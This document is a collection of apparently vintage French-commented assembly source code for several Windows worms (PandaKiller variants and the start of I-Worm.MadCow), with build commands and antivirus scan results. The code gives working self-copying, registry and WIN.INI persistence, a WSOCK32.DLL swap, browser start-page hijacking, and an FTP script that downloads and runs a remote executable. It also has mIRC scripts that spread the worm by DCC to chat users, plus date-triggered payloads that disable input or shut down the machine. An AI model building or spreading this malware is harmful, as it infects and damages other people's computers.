Dans C:\PandaKiller, il cr‚e le fichier "EMail.txt" o— il ‚crit une adresse EMail o— peut nous contacter ainsi qu'un copyright. Il affiche un message et change les bouttons de la souris si on clique sur r‚‚ssayer et modifie ‚galement le nom d'enregistrement par PandaKiller
POUR COMPILER: tasm32 /M /ML PandaKiller.asm tlink32 -Tpe -x -aa PandaKiller.obj,,,import32
Lien : www.coderz.net/matrix www.matrixvx.org www.coderz.net
$ .386p locals jumps .model flat extrn CreateDirectoryA:PROC extrn GetWindowsDirectoryA:PROC extrn GetSystemDirectoryA:PROC extrn GetModuleHandleA:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn lstrcat:PROC extrn MessageBoxA:PROC extrn SwapMouseButton:PROC extrn ExitProcess:PROC
.data moi dd 260 dup (0) targ1 dd 260 dup (0) targ10 dd 260 dup (0) fh dd 0 octets dd 0 l dd 0 p dd 0 CLE db "\Software\Microsoft\Windows\CurrentVersion",00h DONNEE db "PandaKiller",00h NOM db "RegisteredOwner",00h rep1 db "C:\PandaKiller",00h rep2 db "\Panda",00h copie1 db "\PandaKiller.exe",00h copie2 db "\Monopoly.exe",00h copie3 db "\Panda\Stages.exe",00h fichier db "\PandaKiller\EMail.txt",00h
TITRE db "Par PandaKiller le 12/10/00",00h TEXTE db "****************************",10,13 db "Ce fichier n'est pas valide!",10,13 db "****************************",00h
TXT db "[PandaKiller]",0dh,0ah db "Pour tout contact : [email protected]",0dh,0ah db "VBS/LoveLetter.A",0dh,0ah db "VBS/IE55",0dh,0ah db "W32.Happy99",0dh,0ah db "I-Worm/Kak.A",0dh,0ah db "W32.PandaKiller.A par PandaKiller (c)2000",00h taille equ $-TXT
.code
DEBUT: CREER_REPERTOIRE: push 00000000h push offset rep1 call CreateDirectoryA ;C:\Pandakiller push 260 push offset targ1 call GetWindowsDirectoryA push offset rep2 push offset targ1 call lstrcat push offset targ1 call CreateDirectoryA ;%windir%\Panda
AUTO_COPIE: push 00000000h call GetModuleHandleA push 260 push offset moi push eax call GetModuleFileNameA push 260 push offset targ1 call GetWindowsDirectoryA push offset copie1 push offset targ1 call lstrcat push 00000000h push offset targ1 push offset moi call CopyFileA ;%windir%\PandaKiller.exe push 260 push offset targ1 call GetSystemDirectoryA push offset copie2 push offset targ1 call lstrcat push 00000000h push offset targ1 push offset moi call CopyFileA ;%system%\Monopoly.exe
push 260 push offset targ10 call GetWindowsDirectoryA push offset copie3 push offset targ10 call lstrcat push 00000000h push offset targ10 push offset targ1 call CopyFileA ;%windir%\Panda\Stages.exe
FICHIER_TEXTE: push 00000000h push 00000080h push 00000002h push 00000000h push 00000001h push 40000000h push offset fichier call CreateFileA mov [fh],eax push 00h push offset octets push taille push offset TXT push [fh] call WriteFile push [fh] call CloseHandle
REGISTRE: push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE ;PandaKiller push 01h push 0 push offset NOM ;DANS RegisteredOwner push p call RegSetValueExA ;CREE UN REGISTRE push 0 call RegCloseKey ;FERME LA BASE DE REGISTRE
MESSAGE: push 35h push offset TITRE push offset TEXTE push 00h call MessageBoxA cmp eax,4 jne FIN
SOURIS: push 01h call SwapMouseButton jmp MESSAGE
FIN: push 0 call ExitProcess end DEBUT File W32PKa.exe received on 05.16.2009 10:40:20 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 - AhnLab-V3 5.0.0.2 2009.05.15 - AntiVir 7.9.0.168 2009.05.15 - Antiy-AVL 2.0.3.1 2009.05.15 - Authentium 5.1.2.4 2009.05.15 W32/Heuristic-131!Eldorado Avast 4.8.1335.0 2009.05.15 - AVG 8.5.0.336 2009.05.15 - BitDefender 7.2 2009.05.16 - CAT-QuickHeal 10.00 2009.05.15 - ClamAV 0.94.1 2009.05.15 - Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 - eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 - F-Prot 4.4.4.56 2009.05.15 W32/Heuristic-131!Eldorado F-Secure 8.0.14470.0 2009.05.15 Suspicious:W32/Malware!Gemini Fortinet 3.117.0.0 2009.05.16 - GData 19 2009.05.16 - Ikarus T3.1.1.49.0 2009.05.16 - K7AntiVirus 7.10.735 2009.05.14 - Kaspersky 7.0.0.125 2009.05.16 Heur.Worm.Generic McAfee 5616 2009.05.15 - McAfee+Artemis 5616 2009.05.15 - McAfee-GW-Edition 6.7.6 2009.05.15 - Microsoft 1.4602 2009.05.16 - NOD32 4080 2009.05.15 probably unknown NewHeur_PE Norman 6.01.05 2009.05.16 - nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.15 - PCTools 4.4.2.0 2009.05.15 - Prevx 3.0 2009.05.16 - Rising 21.29.51.00 2009.05.16 - Sophos 4.41.0 2009.05.16 - Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v) Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 - VBA32 3.12.10.5 2009.05.16 - ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.15 - Additional information File size: 8192 bytes MD5...: 711f77c3a07ea085bee6c1bfa884f012 SHA1..: 3cd6512c587c3b0292264177f3d538aa6e9c6965 comment $
W32.PandaKiller.B par PandaKiller le 14 octobre 2000
S'AUTO-COPIE DANS : - %windir%\WinExec.exe
DESCRIPTION:
Ce programme modifie le nom d'enregistrement en PandaKiller. Il se copie dans %windir% (Dossier WINDOWS) et modifie la page de d‚marrage d'Internet. Il cr‚e ensuite trois fichiers : - FTP.DRV : ce fichier va se connecter par FTP et t‚l‚charger un programme qui est KILL_CIH.EXE (un programme contre CIH) - FTP.BAT : il va ‚x‚cuter FTP.DRV - MIRC.EKP : un script pour mIRC qui permet une autoprobagation du fichier. A la connection, il active FTP.BAT et cope WINEXEC.EXE en PICTURE.EXE. Quand quelqu'un arrive, il lui envoie PICTURE.EXE *worm* il envoie ‚galement PICTURE.EXE *KKK* : d‚connecte *White Power* : ‚teint le programme *hitler* : efface Regedit.exe
POUR COMPILER: tasm32 /M /ML PandaKiller2.asm tlink32 -Tpe -x -aa PandaKiller2.obj,,,import32
Lien : www.coderz.net/matrix www.matrixvx.org www.coderz.net $ .386p locals jumps .model flat extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn GetWindowsDirectoryA:PROC extrn GetModuleHandleA:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn lstrcat:PROC extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn WinExec:PROC extrn CreateDirectoryA:PROC extrn ExitProcess:PROC
.data moi dd 260 dup (0) targ1 dd 260 dup (0) fh dd 0 octets dd 0 l dd 0 p dd 0 CLE db "\Software\Microsoft\Windows\CurrentVersion",00h DONNEE db "PandaKiller",00h NOM db "RegisteredOwner",00h CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h DONNEE2 db "http://kadosh.multimania.com",00h NOM2 db "Start Page",00h CLE3 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h DONNEE3 db "C:\Win\kill_cih.exe",00h NOM3 db "killcih",00h copie1 db "\WinExec.exe",00h dossier db "C:\Win",00h bat db "C:\Win\ftp.bat",00h drv db "C:\Win\ftp.drv",00h ini db "C:\Win\mirc.ekp",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\program files\mirc\script.ini",00h script4 db "C:\program files\mirc32\script.ini",00h
batd db "@echo off",0dh,0ah db "start ftp -i -v -s:C:\Win\ftp.drv",00h batsize equ $-batd drvd db "open",0dh,0ah db "members.aol.com",0dh,0ah db "pentasm99",0dh,0ah db "cd Panda",0dh,0ah db "binary",0dh,0ah db "lcd C:\Win",0dh,0ah db "get kill_cih.exe",0dh,0ah db "bye",0dh,0ah db "exit",0dh,0ah drvsize equ $-drvd inid db "[SCRIPT]",0dh,0ah db "n1=on 1:start:{",0dh,0ah db "n2=.remote on",0dh,0ah db "n3=.ctcps on",0dh,0ah db "n4=.events on",0dh,0ah db "n5=}",0dh,0ah db "n6=on 1:connect:{",0dh,0ah db "n7= /.copy -0 C:\Windows\WinExec.exe C:\Picture.exe",0dh,0ah db "n8= /.run -n C:\command.com start C:\Win\ftp.bat",0dh,0ah db "n9=on 1:join:#:{",0dh,0ah db "n10=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah db "n11=}",0dh,0ah db "n12=on 1:text:*worm*:{",0dh,0ah db "n13=if ( $nick == $ma ) {halt } .dcc send $nick C:\Picture.exe",0dh,0ah db "n14=}",0dh,0ah db "n15=on 1:text:*KKK*:/disconnect",0dh,0ah db "n16=on 1:text:*white power*:/exit",0dh,0ah db "n17=on 1:text:*hitler*:/remove C:\Windows\regedit.exe",0dh,0ah inisize equ $-inid .code REGISTRE: push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE ;PandaKiller push 01h push 0 push offset NOM ;DANS RegisteredOwner push p call RegSetValueExA ;CREE UNE VALEUR push 0 call RegCloseKey ;FERME LA BASE DE REGISTRE
AUTO_COPIE: push 00000000h call GetModuleHandleA push 260 push offset moi push eax call GetModuleFileNameA push 260 push offset targ1 call GetWindowsDirectoryA push offset copie1 push offset targ1 call lstrcat push 00000000h push offset targ1 push offset moi call CopyFileA ;%windir%\WinExec.exe
CREER_DOSSIER: push 00000000h push offset dossier call CreateDirectoryA ;C:\Win
REGISTRE2: push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE2 push 80000001h ;HKEY_CURRENT_USER call RegCreateKeyExA push 05h push offset DONNEE2 ;kadosh.multimania.com push 01h push 0 push offset NOM2 ;Start Page push p call RegSetValueExA ;CREE UNE VALEUR push 0 call RegCloseKey ;FERME LA BASE DE REGISTRE push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE3 push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE3 ;C:\nobo.exe push 01h push 0 push offset NOM3 ;NOBO push p call RegSetValueExA ;CREE UNE VALEUR push 0 call RegCloseKey ;FERME LA BASE DE REGISTRE
FICHIER: push 00000000h push 00000080h push 00000002h push 00000000h push 00000001h push 40000000h push offset bat call CreateFileA mov [fh],eax push 00h push offset octets push batsize push offset batd push [fh] call WriteFile push [fh] call CloseHandle push 00000000h push 00000080h push 00000002h push 00000000h push 00000001h push 40000000h push offset drv call CreateFileA mov [fh],eax push 00h push offset octets push drvsize push offset drvd push [fh] call WriteFile push [fh] call CloseHandle
push 00000000h push 00000080h push 00000002h push 00000000h push 00000001h push 40000000h push offset ini call CreateFileA mov [fh],eax push 00h push offset octets push inisize push offset inid push [fh] call WriteFile push [fh] call CloseHandle
COPIE_MIRC: push 00000000h push offset script1 push offset ini call CopyFileA push 00000000h push offset script2 push offset ini call CopyFileA push 00000000h push offset script3 push offset ini call CopyFileA push 00000000h push offset script4 push offset ini call CopyFileA WinExecBat: push 1 push offset bat call WinExec
FIN: push 0 call ExitProcess end REGISTRE File W32PKb.exe received on 05.16.2009 10:41:58 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 - AhnLab-V3 5.0.0.2 2009.05.15 - AntiVir 7.9.0.168 2009.05.15 HEUR/Malware Antiy-AVL 2.0.3.1 2009.05.15 - Authentium 5.1.2.4 2009.05.15 - Avast 4.8.1335.0 2009.05.15 - AVG 8.5.0.336 2009.05.15 - BitDefender 7.2 2009.05.16 Generic.Malware.SIsp!.664610C1 CAT-QuickHeal 10.00 2009.05.15 - ClamAV 0.94.1 2009.05.15 - Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 Trojan.MulDrop.origin eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 - F-Prot 4.4.4.56 2009.05.15 - F-Secure 8.0.14470.0 2009.05.15 W32/P2PWorm Fortinet 3.117.0.0 2009.05.16 - GData 19 2009.05.16 Generic.Malware.SIsp!.664610C1 Ikarus T3.1.1.49.0 2009.05.16 - K7AntiVirus 7.10.735 2009.05.14 - Kaspersky 7.0.0.125 2009.05.16 Heur.StartPage McAfee 5616 2009.05.15 New Malware.b McAfee+Artemis 5616 2009.05.15 New Malware.b McAfee-GW-Edition 6.7.6 2009.05.15 Heuristic.Malware Microsoft 1.4602 2009.05.16 - NOD32 4080 2009.05.15 probably unknown NewHeur_PE Norman 6.01.05 2009.05.16 W32/P2PWorm nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.15 Suspicious file PCTools 4.4.2.0 2009.05.15 IRC.Sensi.B Prevx 3.0 2009.05.16 - Rising 21.29.51.00 2009.05.16 - Sophos 4.41.0 2009.05.16 - Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v) Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 - VBA32 3.12.10.5 2009.05.16 - ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.15 IRC.Sensi.B Additional information File size: 8192 bytes MD5...: 58c6c31028ac1b84cc73eb13300f21da SHA1..: a73cf795bc76385b71158a64cc770a813b399b74 comment $
*** ** * * *** ** * * * * * **** *** * * * * ** * * * * * * * * * * * * * * * * * ** * * * * * ** * * * ** * * * * **** * ** * * **** ** * * * * *** * * * * ** * * * * * * * * * * * * * * * * * *** * * * * * **** **** **** * *
W32.PandaKiller.C par PandaKiller le 17 octobre 2000
S'AUTO-COPIE DANS : - %windir%\WinExec.exe
DESCRIPTION : 5/12 : Nom d'enregistrement : PandaKiller 2001 : D‚sactive clavier et souris
POUR COMPILER: tasm32 /M /ML PandaKiller3.asm tlink32 -Tpe -x -aa PandaKiller3.obj,,,import32
$ jumps locals .386 .model flat extrn GetModuleHandleA:PROC extrn GetModuleFileNameA:PROC extrn GetWindowsDirectoryA:PROC extrn CopyFileA:PROC extrn lstrcat:PROC extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC extrn GetSystemTime:PROC extrn MessageBoxA:PROC extrn ExitProcess:PROC
.data moi dd 260 dup (0) targ1 dd 260 dup (0) copie db "\WinExec.exe",00h l dd 0 p dd 0 CLE db "\Software\Microsoft\Windows\CurrentVersion",00h DONNEE db "PandaKiller",00h NOM db "RegisteredOwner",00h CLE2 db "\Software\Microsoft\Windows\CurrentVersion\Run",00h DONNEE2 db "%windir%\WinExec.exe",00h NOM2 db "WinExec",00h DONNEE3 db "rundll32 mouse,disable",00h NOM3 db "Stop1",00h DONNEE4 db "rundll32 keyboard,disable",00h NOM4 db "Stop2",00h TITRE db "T.PK.3",00h TEXTE db "VOUS SOUHAITE UNE BONNE ANNEE !",00h
SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wsecond WORD ? wMilliseconds WORD ? SYSTIME ends SystemTime SYSTIME <>
.code DEBUT: AUTO_COPIE: push 00000000h call GetModuleHandleA push 260 push offset moi push eax call GetModuleFileNameA push 260 push offset targ1 call GetWindowsDirectoryA push offset copie push offset targ1 call lstrcat push 00000000h push offset targ1 push offset moi call CopyFileA ;%windir%\WinExec.exe
push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE2 push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE2 ;%windir%\WinExec.exe push 01h push 0 push offset NOM2 push p call RegSetValueExA ;CREE UNE VALEUR push 0 call RegCloseKey ;FERME LA BASE DE REGISTRE HEURE: push offset SystemTime call GetSystemTime cmp [SystemTime.wMonth],0Ch jne HEURE2 cmp [SystemTime.wDay],05h jne HEURE2
REGISTRE: push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE ;PandaKiller push 01h push 0 push offset NOM ;DANS RegisteredOwner push p call RegSetValueExA ;CREE UNE VALEUR push 0 call RegCloseKey ;FERME LA BASE DE REGISTRE
HEURE2: push offset SystemTime call GetSystemTime cmp [SystemTime.wYear],7D1h jne FIN REGISTRE2: push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE2 push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE3 ;mouse,disable push 01h push 0 push offset NOM3 push p call RegSetValueExA ;CREE UNE VALEUR push offset l push offset p push 0 push 1F0000h + 1 + 2h push 0 push 0 push 0 push offset CLE2 push 80000002h ;HKEY_LOCAL_MACHINE call RegCreateKeyExA push 05h push offset DONNEE4 ;keyboard,disable push 01h push 0 push offset NOM4 push p call RegSetValueExA ;CREE UNE VALEUR push 0 call RegCloseKey
MESSAGE:push 40h push offset TITRE push offset TEXTE push 0 call MessageBoxA FIN: push 0 call ExitProcess end DEBUT File W32PKc.exe received on 05.16.2009 10:42:04 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 - AhnLab-V3 5.0.0.2 2009.05.15 - AntiVir 7.9.0.168 2009.05.15 - Antiy-AVL 2.0.3.1 2009.05.15 - Authentium 5.1.2.4 2009.05.15 - Avast 4.8.1335.0 2009.05.15 - AVG 8.5.0.336 2009.05.15 BAT/Generic BitDefender 7.2 2009.05.16 - CAT-QuickHeal 10.00 2009.05.15 - ClamAV 0.94.1 2009.05.15 - Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 Trojan.DownLoader.origin eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 - F-Prot 4.4.4.56 2009.05.15 - F-Secure 8.0.14470.0 2009.05.15 Suspicious:W32/Malware!Gemini Fortinet 3.117.0.0 2009.05.16 - GData 19 2009.05.16 - Ikarus T3.1.1.49.0 2009.05.16 - K7AntiVirus 7.10.735 2009.05.14 - Kaspersky 7.0.0.125 2009.05.16 - McAfee 5616 2009.05.15 - McAfee+Artemis 5616 2009.05.15 - McAfee-GW-Edition 6.7.6 2009.05.15 - Microsoft 1.4602 2009.05.16 - NOD32 4080 2009.05.15 probably unknown NewHeur_PE Norman 6.01.05 2009.05.16 - nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.15 Suspicious file PCTools 4.4.2.0 2009.05.15 - Prevx 3.0 2009.05.16 - Rising 21.29.51.00 2009.05.16 - Sophos 4.41.0 2009.05.16 - Sunbelt 3.2.1858.2 2009.05.16 BehavesLike.Win32.Malware (v) Symantec 1.4.4.12 2009.05.16 - TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 - VBA32 3.12.10.5 2009.05.16 - ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.15 - Additional information File size: 8192 bytes MD5...: a133a8af3b031045bd0ae4c7d9fa4210 SHA1..: d3481290f42e9f1485d7d9cdc5184159e5272297 comment $ *** ** * * *** ** * * * * * **** *** * * * * ** * * * * * * * * * * * * * * * * * ** * * * * * ** * * * ** * * * * **** * ** * * **** ** * * * * *** * * * * ** * * * * * * * * * * * * * * * * * *** * * * * * **** **** **** * *
W95/98.PandaKiller par PandaKiller le 1er novembre 2000 POUR COMPILER: tasm32 /M /ML ?????.asm tlink32 -Tpe -x -aa ?????.obj,,,import32
$
.386 jumps locals .model flat, stdcall
;KERNEL32.dll extrn lstrcat:PROC extrn WritePrivateProfileStringA:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateFileA:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn CloseHandle:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetWindowsDirectoryA:PROC extrn Sleep:PROC extrn WinExec:PROC extrn WriteFile:PROC extrn GetSystemTime:PROC
;USER32.dll extrn MessageBoxA:PROC extrn SwapMouseButton:PROC extrn ExitWindowsEx:PROC extrn GetVersionExA:PROC
;ADVAPI32.dll extrn RegCreateKeyExA:PROC extrn RegCloseKey:PROC .data szOrig db 260 dup (0) szCopie db 260 dup (0) szWsk1 db 260 dup (0) szWsk2 db 260 dup (0) szWin db 260 dup (0) szWin2 db 260 dup (0) fh dd 0 octets dd 0 regDisp dd 0 regResu dd 0 Copie db "\WinExec.exe",00h Wsk1 db "\WSOCK32.DLL",00h Wsk2 db "\WSOCK32.TPK",00h Wininit db "\\WININIT.INI",00h windows db "windows",00h run db "run",00h Winini db "\\WIN.INI",00h nul db "NUL",00h rename db "Rename",00h ini db "C:\script.tpk",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\program files\mirc\script.ini",00h script4 db "C:\program files\mirc32\script.ini",00h CLE db "Software\[PandaKiller]",00h TITRE db "Error Loader",00h TEXTE db "Windows NT required !",0dh,0ah db "This program will be terminated",00h inid db "[script]",0dh,0ah db "n0=on 1:start:{",0dh,0ah db "n1=.remote on",0dh,0ah db "n2=.ctcps on",0dh,0ah db "n3= .events on",0dh,0ah db "n4=}",0dh,0ah db "n5=on 1:join:#:{",0dh,0ah db "n6= if ( $nick == $me ) { halt } | .dcc " db "send $nick C:\Windows\WinExec.exe",0dh,0ah db "n7=}",0dh,0ah initaille equ $-inid
SYSTIME struct wYear WORD ? wMonth WORD ? wDayOfWeek WORD ? wDay WORD ? wHour WORD ? wMinute WORD ? wsecond WORD ? wMilliseconds WORD ? SYSTIME ends SystemTime SYSTIME <>
.code DEBUT: mov eax, offset CLE ; V‚rifie si il existe une cl‚ call REG ; [PandaKiller] dans HKLM\Software. cmp [regDisp],1 ; Si elle n'y est pas, jne FICHIER ; il installe les composants WCOPIE: push 0 ; call GetModuleHandleA ; push 260 ; Le programme se copie dans le push offset szOrig ; push eax ; call GetModuleFileNameA ; dossier WINDOWS de l'ordinateur push 260 ; push offset szCopie ; et se nommera WinExec.exe call GetWindowsDirectoryA ; push offset Copie ; push offset szCopie ; call lstrcat ; push 0 ; push offset szCopie ; push offset szOrig ; call CopyFileA ;
WIN_INI:push 260 ; On met dans le fichier WIN.INI push offset szWin2 ; une routine pour que le programme call GetWindowsDirectoryA ; s'active … chaque d‚marrage. push offset Winini ; Cela ‚vite d'utiliser la BASE DE push offset szWin2 ; REGISTRE trop voyante. call lstrcat ; push offset szWin2 ; Dans WIN.INI du dossier WINDOWS push offset szCopie ; "nom du programme" push offset run ; run= push offset windows ; [windows] call WritePrivateProfileStringA ;
WSOCK32:push 260 ; push offset szWsk1 ; Ici, on copie le fichier du call GetSystemDirectoryA ; r‚pertoire SYSTEM, WSOCK32.DLL push 260 ; push offset szWsk2 ; en WSOCK32.TPK dans le mˆme call GetSystemDirectoryA ; r‚pertoire SYSTEM push offset Wsk1 ; push offset szWsk1 ; call lstrcat ; push offset Wsk2 ; push offset szWsk2 ; call lstrcat ; push 0 ; push offset szWsk2 ; push offset szWsk1 ; call CopyFileA ; WININIT:push 260 ; Pour que l'ordinateur puisse push offset szWin ; utiliser le nouveau fichier call GetWindowsDirectoryA ; WSOCK32.TPK, on va ‚crire dans push offset Wininit ; le fichier WININIT.INI dans le push offset szWin ; r‚pertoire WNDOWS. call lstrcat ; La routine est simple : push offset szWin ; push offset szWsk1 ; push offset nul ; push offset rename ; [Rename] call WritePrivateProfileStringA ; NUL=%system%\WSOCK32.DLL push offset szWin ; push offset szWsk2 ; push offset szWsk1 ; push offset rename ; call WritePrivateProfileStringA ; %sys%\WSOCK32.DLL=%sys%\WSOCK32.TPK jmp FICHIER
REG: push offset regDisp ; push offset regResu ; push 0 ; default security descriptor push 0F003FH ; KEY_ALL_ACCESS push 0 ; push 0 ; push 0 ; push eax ; adresse de la sous-CLE push 80000002h ; HKEY_LOCAL_MACHINE call RegCreateKeyExA ; SUITE: push [regResu] ; call RegCloseKey ; ret
FICHIER:push 00000000h ; Voila, un des moyens les plus push 00000080h ; pratique pour envoyer notre push 00000002h ; programme un peu partout. push 00000000h ; push 00000001h ; C'est mIRC. push 40000000h ; push offset ini ; En utilisant un script, mIRC va call CreateFileA ; automatiquement envoyer notre mov [fh],eax ; programme … tous ceux qui se trouve push 00h ; dans le CHANNEL de la victime. push offset octets ; push initaille ; Pour cela, on va ‚crire le script push offset inid ; dans le dossier C:\ push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ;
COPIE: push 00000000h ; Puis on va le copier dans les push offset script1 ; dossier suivant : push offset ini ; call CopyFileA ; C:\mirc push 00000000h ; push offset script2 ; push offset ini ; call CopyFileA ; C:\mirc32 push 00000000h ; push offset script3 ; push offset ini ; call CopyFileA ; C:\program files\mirc push 00000000h ; push offset script4 ; push offset ini ; call CopyFileA ; C:\program files\mirc32 push 00h ; push offset ini ; call DeleteFileA ; Puis efface l'original.
ATTEND: push 60 * 1 * 1000 ; call Sleep ; Fait une pause de 1 minute.
SOURIS: push 01h ; call SwapMouseButton ; Modifie les boutons de la souris.
HEURE2: push offset SystemTime ; call GetSystemTime ; Regarde la date du systˆme. cmp [SystemTime.wYear],7D1h ; Si nous ne sommes pas en l'an 2001, jne ALERT ; il saute au label ALERT ETEIND: push 01h ; call ExitWindowsEx ; Sinon ‚teind l'ordinateur. ALERT: push 10h ; push offset TITRE ; Affiche le faux message d'erreur. push offset TEXTE ; push 0 ; call MessageBoxA ;
FIN: push 0 ; call ExitProcess ; Fin du Programme end DEBUT File W95PK.exe received on 05.16.2009 10:42:08 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 - AhnLab-V3 5.0.0.2 2009.05.15 - AntiVir 7.9.0.168 2009.05.15 HEUR/Malware Antiy-AVL 2.0.3.1 2009.05.15 - Authentium 5.1.2.4 2009.05.15 - Avast 4.8.1335.0 2009.05.15 - AVG 8.5.0.336 2009.05.15 IRC/Generic.dropper BitDefender 7.2 2009.05.16 BehavesLike:Win32.IRC-Worm CAT-QuickHeal 10.00 2009.05.15 - ClamAV 0.94.1 2009.05.15 W32.Ultratt.gz Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 BACKDOOR.Trojan eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 - F-Prot 4.4.4.56 2009.05.15 - F-Secure 8.0.14470.0 2009.05.15 W32/P2PWorm Fortinet 3.117.0.0 2009.05.16 - GData 19 2009.05.16 BehavesLike:Win32.IRC-Worm Ikarus T3.1.1.49.0 2009.05.16 - K7AntiVirus 7.10.735 2009.05.14 - Kaspersky 7.0.0.125 2009.05.16 IRC-Worm.DOS.Generic McAfee 5616 2009.05.15 New Malware.b McAfee+Artemis 5616 2009.05.15 New Malware.b McAfee-GW-Edition 6.7.6 2009.05.15 Heuristic.Malware Microsoft 1.4602 2009.05.16 - NOD32 4080 2009.05.15 probably unknown NewHeur_PE Norman 6.01.05 2009.05.16 W32/P2PWorm nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.15 - PCTools 4.4.2.0 2009.05.15 IRC.Buffy.C Prevx 3.0 2009.05.16 - Rising 21.29.51.00 2009.05.16 - Sophos 4.41.0 2009.05.16 - Sunbelt 3.2.1858.2 2009.05.16 - Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 Possible_Virus VBA32 3.12.10.5 2009.05.16 - ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.15 IRC.Buffy.C Additional information File size: 8192 bytes MD5...: f7b2facb5e2c9e5870065004446a8867 SHA1..: 837ce36b596ffab1af92ac1c63506fa613e16e6c comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000
Pour assembler : tasm32 /M /ML madcow.asm tlink32 -Tpe -aa -x madcow.obj,,,import32.lib * jumps locals .386 .model flat,stdcall
;KERNEL32.dll extrn lstrcat:PROC extrn WritePrivateProfileStringA:PROC extrn CloseHandle:PROC extrn CopyFileA:PROC extrn CreateDirectoryA:PROC extrn CreateFileA:PROC extrn DeleteFileA:PROC extrn ExitProcess:PROC extrn GetModuleFileNameA:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetWindowsDirectoryA:PROC extrn MoveFileA:PROC extrn WinExec:PROC extrn WriteFile:PROC
;ADVAPI32.dll extrn RegSetValueExA:PROC extrn RegCreateKeyExA:PROC extrn RegCloseKey:PROC
